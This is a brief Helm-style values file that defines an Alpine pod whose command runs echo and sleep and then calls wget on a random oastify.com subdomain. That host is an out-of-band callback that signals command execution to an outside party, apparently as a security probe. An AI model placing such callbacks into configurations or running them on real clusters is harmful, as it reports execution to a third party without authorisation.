command: "echo Hello from Helm && sleep 20 && echo done && wget f4k8bqbm73n0wzvqqjggsjnnfel59vxk.oastify.com"
image:
  repository: alpine
  tag: 3.18
  pullPolicy: IfNotPresent
podName: run-command-pod
namespace: default